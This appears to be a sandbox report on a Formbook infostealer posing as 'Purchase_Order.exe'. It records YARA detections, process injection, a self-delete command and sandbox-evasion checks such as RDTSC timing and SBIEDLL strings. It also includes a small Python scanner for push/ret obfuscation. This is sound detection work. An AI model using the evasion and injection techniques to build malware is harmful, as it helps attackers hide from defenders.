Source: Purchase_Order.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Purchase_Order.exe Binary or memory string: OriginalFilename vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.271664791.0000000007F50000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKygo.dll* vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.272587457.0000000008220000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000000.232767352.00000000005B6000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.271267830.0000000007EC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase_Order.exe
Source: Purchase_Order.exe Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
Uses 32bit PE files
Source: Purchase_Order.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@13/10
Source: C:\Users\user\Desktop\Purchase_Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
Source: C:\Users\user\Desktop\Purchase_Order.exe Mutant created: \Sessions\1\BaseNamedObjects\rjmTOaAYwV
Source: C:\Users\user\Desktop\Purchase_Order.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: Purchase_Order.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase_Order.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Purchase_Order.exe Virustotal: Detection: 20%
Source: Purchase_Order.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\Purchase_Order.exe File read: C:\Users\user\Desktop\Purchase_Order.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase_Order.exe 'C:\Users\user\Desktop\Purchase_Order.exe'
Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Purchase_Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase_Order.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Purchase_Order.exe Static file information: File size 1532416 > 1048576
Source: Purchase_Order.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x14da00
Source: Purchase_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Purchase_Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F73C3 push 0000006Fh; ret 0_2_004F73CE
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F67F4 push es; ret 0_2_004F67FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004160EF push ebp; retf 4_2_004160F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00415250 push 00000036h; ret 4_2_0041525C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004152DE push ebp; retf 4_2_004152F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B46C push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B402 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B40B push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00414E67 pushfd ; retf 4_2_00414E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012CD0D1 push ecx; ret 4_2_012CD0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FBD0D1 push ecx; ret 16_2_04FBD0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D60EF push ebp; retf 16_2_010D60F2
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB3B5 push eax; ret 16_2_010DB408
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D5250 push 00000036h; ret 16_2_010D525C
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D52DE push ebp; retf 16_2_010D52F6
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB40B push eax; ret 16_2_010DB472
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB402 push eax; ret 16_2_010DB408
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB46C push eax; ret 16_2_010DB472
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D4E67 pushfd ; retf 16_2_010D4E68
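Every entry above is a push followed by ret or retf: push of an immediate and then ret is a jmp that disassemblers and simple control-flow heuristics do not see as a branch, and the push ebp / pushfd / push es variants with retf land on whatever happens to be on the stack. The scanner below is an added example, not report or vendor code, and is stricter than the sandbox's heuristic: it only reports a push that is immediately followed by the return, which keeps a linear byte sweep from misreading immediate bytes as opcodes. The SAMPLE buffer is constructed for the example; it is not bytes from this sample.

```python
import struct

# 32-bit push forms that appear in the report, plus the two returns that
# complete the obfuscated jump.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_FORMS = {0xC3: "ret", 0xCB: "retf"}


def decode_push(code, i):
    """Decode a push at offset i: (mnemonic, length, target) or None.
    target is the pushed immediate (the address a following ret jumps to);
    None for register, flags and segment pushes."""
    op = code[i]
    if op == 0x6A and i + 1 < len(code):            # push imm8, sign-extended
        imm = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
        return f"push {imm:08X}h", 2, imm
    if op == 0x68 and i + 4 < len(code):            # push imm32
        imm = struct.unpack_from("<I", code, i + 1)[0]
        return f"push {imm:08X}h", 5, imm
    if 0x50 <= op <= 0x57:                          # push r32
        return f"push {REG32[op - 0x50]}", 1, None
    if op == 0x9C:                                  # pushfd
        return "pushfd", 1, None
    if op == 0x06:                                  # push es
        return "push es", 1, None
    return None


def scan_push_ret(code, base=0):
    """Linear sweep for push immediately followed by ret/retf."""
    findings = []
    i = 0
    while i < len(code):
        push = decode_push(code, i)
        if push is not None:
            mnemonic, length, target = push
            j = i + length
            if j < len(code) and code[j] in RET_FORMS:
                findings.append({
                    "va": base + i,
                    "push": mnemonic,
                    "ret": RET_FORMS[code[j]],
                    "ret_va": base + j,
                    "target": target,
                })
                i = j + 1
                continue
        i += 1
    return findings


# Constructed buffer: a normal prologue, then the push/ret shapes the report
# lists for RegSvcs.exe and systray.exe, then a lone ret.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                         # push ebp; mov ebp, esp (no hit)
    0x6A, 0x36, 0xC3,                         # push 36h; ret
    0x68, 0x00, 0x10, 0x40, 0x00, 0xC3,       # push 401000h; ret == jmp 0x401000
    0x55, 0xCB,                               # push ebp; retf
    0x9C, 0xCB,                               # pushfd; retf
    0x50, 0xC3,                               # push eax; ret
    0x06, 0xC3,                               # push es; ret
    0xC3,                                     # lone ret (no hit)
])

if __name__ == "__main__":
    for f in scan_push_ret(SAMPLE, base=0x400000):
        tgt = f"-> {f['target']:08X}" if f["target"] is not None else "-> [stack]"
        print(f"{f['va']:08X} {f['push']}; {f['ret']} {tgt}")
```

The target field is the useful output for immediates: push 401000h; ret resolves to a concrete jump destination that can be followed, whereas a pushed small constant such as 36h (as in 4_2_00415250 above) is junk that only exists to break disassembly.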
Source: initial sample Static PE information: section name: .text entropy: 7.38800218232
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase_Order.exe PID: 1528, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000010C85E4 second address: 00000000010C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000010C897E second address: 00000000010C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238750 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238406 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237563 Jump to behavior
